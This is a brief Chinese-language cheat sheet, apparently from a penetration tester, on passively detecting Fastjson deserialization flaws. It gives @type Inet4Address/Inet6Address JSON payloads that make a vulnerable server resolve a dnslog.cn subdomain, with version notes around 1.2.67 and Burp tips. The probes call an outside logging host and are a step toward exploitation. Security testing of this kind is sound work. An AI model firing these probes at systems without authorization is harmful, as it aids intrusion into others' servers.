fastjson被动探测
fastjson实际测试复杂,使用被动探测确定漏洞存在
历史版本
1 dnslog
-
1.2.67之前版本
{“zeo”:{"@type":“java.net.Inet4Address”,“val”:“fatu5k.dnslog.cn”}} -
1.2.67之后版本
{"@type":“java.net.Inet4Address”,“val”:“dnslog”}
{"@type":“java.net.Inet6Address”,“val”:“dnslog”}
获取dns.log
http://www.dnslog.cn/
burp插件测试
不用加Content-Type: application/json,修改get为post,加上要发送的内容的就可以了。
2 ceye.io探测
3 burp插件
需要一条正常的json数据,直接点击原始数据,复制下来
{
“age”:25,
“name”:“Bob”
}
burp发送fastjson检测,修改为post,不用加Content-Type: application/json